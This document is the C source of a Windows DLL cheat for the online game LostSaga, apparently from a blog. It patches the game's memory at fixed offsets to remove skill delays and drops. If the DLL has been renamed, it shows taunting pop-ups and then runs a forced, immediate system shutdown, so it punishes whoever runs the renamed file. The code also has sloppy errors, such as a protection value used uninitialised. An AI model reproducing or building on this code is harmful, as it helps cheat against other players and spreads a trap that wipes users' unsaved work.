//======================================//
// LostSaga Base Auto ON
// Credit by Dimas Adi Nugroho
// Don't Share Not Created Or Thank'z !
// Don't Change / Edit This Articel !
// You Change This Articel , You Is Leacher !!
//======================================//
#include <windows.h>
#pragma warning(disable: 4700)
LPTSTR APP = "lostsaga.exe"; // Process Game
DWORD Gravity, adrSpeed, dwI3EXEC, adrProteck, adrDelay, adrReload , adrDelay2 , adrGrade , adrKick , adrDrop , adrPenalty ,adrTokenGold ,adrBrutallDamage ,adrCrusade, adrDarah,ofsMNZ1, dwBase, Change, CheckProtection;
void Blucyz(void *adr, void *ptr, int size)
{
DWORD CheckProtection;
VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &ofsMNZ1);
RtlMoveMemory(adr,ptr,size);
VirtualProtect(adr,size,CheckProtection, &dwBase);
}
//Protect address
void InProtectAndModify(DWORD Offset, DWORD Pointer, DWORD Length){
VirtualProtect((void *)Offset, Length, PAGE_EXECUTE_READWRITE, &CheckProtection); // check apakah address tsb dikunci / protected ? kalau iya, lakukan unprotect
RtlMoveMemory((void *)Offset, (const void*)Pointer, Length); // ubah address tsb menjadi writeable, dan lakukan patch dengan MEMpatch
VirtualProtect((void *)Offset, Length, CheckProtection, &CheckProtection); // protect lagi address tsb biar gk kena satpam
}
// Lakukan patch terhadap memory
int MEMhack( BYTE *Offset, BYTE *ByteArray, DWORD Length){
InProtectAndModify((DWORD)Offset , (DWORD)ByteArray , 2);
}
BOOL wanda(unsigned long ADRexec, int OFSexec, int PTRexec)
{
if (!IsBadWritePtr((void*)ADRexec, sizeof(unsigned long)))
{
if (!IsBadWritePtr((void*)(*(unsigned long*)ADRexec + OFSexec), sizeof(unsigned long)))
{
*(int*)(*(unsigned long*)ADRexec + OFSexec) = PTRexec;
}
}
return (0);
}
DWORD WINAPI GantengsHex(LPVOID param)
{
while(1)
{
//========================= Auto ON Hotkeys ========================================
dwI3EXEC = (DWORD)GetModuleHandleA("lostsaga.exe");
if(dwI3EXEC >0)
{
DWORD adrDelay = dwI3EXEC+0xAEF078;//Skill 0 Second
Blucyz((void *)(adrDelay),(void*)(PBYTE)"\x68\x61\x73\x5F\x73\x6B\x69\x6C\x6C\x5F\x67\x61\x75\x67\x65\x00\x6D\x61\x67\x69\x63\x5F\x63\x69\x72\x63\x6C\x65\x5F\x79\x5F\x6F\x66\x66\x73\x65\x74", 37);
DWORD adrDrop = dwI3EXEC+0xADC140;//No Drop
Blucyz((void *)(adrDrop),(void*)(PBYTE)"\x66\x61\x6C\x6C\x5F\x6D\x69\x6E\x5F\x64\x61\x6D\x61\x67\x65", 15);
DWORD adrCrusade = dwI3EXEC+0xAE4B38;//Freeze Skull Crusade
Blucyz((void *)(adrCrusade),(void*)(PBYTE)"\x4C\x69\x6D\x69\x74\x48\x50\x52\x61\x74\x65\x4D\x69\x6E", 14);
}
//------------------------------------------------------------------------------
{
Sleep(108);
}
}
return(0);
}
//------------------------------------------------------------------------------
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved)
{
if(dwReason == DLL_PROCESS_ATTACH) {
char strDLLName [_MAX_PATH];
Sleep(200);
MessageBox (0,"I Love You AINUN NABILA :*kiss","Dimas & Ainun", MB_OKCANCEL + MB_ICONINFORMATION);
GetModuleFileName(hModule, strDLLName , _MAX_PATH);
if (strstr(strDLLName, "Mikazu07.dll") <= 0) {
MessageBox(0, "Why you Renaming My File ?","|| == Dimas Syahputra == ||",MB_ICONSTOP | MB_OK);
MessageBox(0, "You This Cheater Or Leacher ?","|| == Dimas Syahputra == ||",MB_ICONSTOP | MB_OK);
MessageBox(0, "See You , \nYour System Data We Restart\n\nTo Say GoodBye ","|| == Dimas Syahputra == ||",MB_ICONSTOP | MB_OK);
system("start C:/Windows/System32/shutdown.exe -s -f -t 00");
ExitProcess(0);//ERROR
}
//------------------------------------------------------------------------------
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)GantengsHex, 0, 0, 0);
}
return TRUE;
}
0 komentar:
Posting Komentar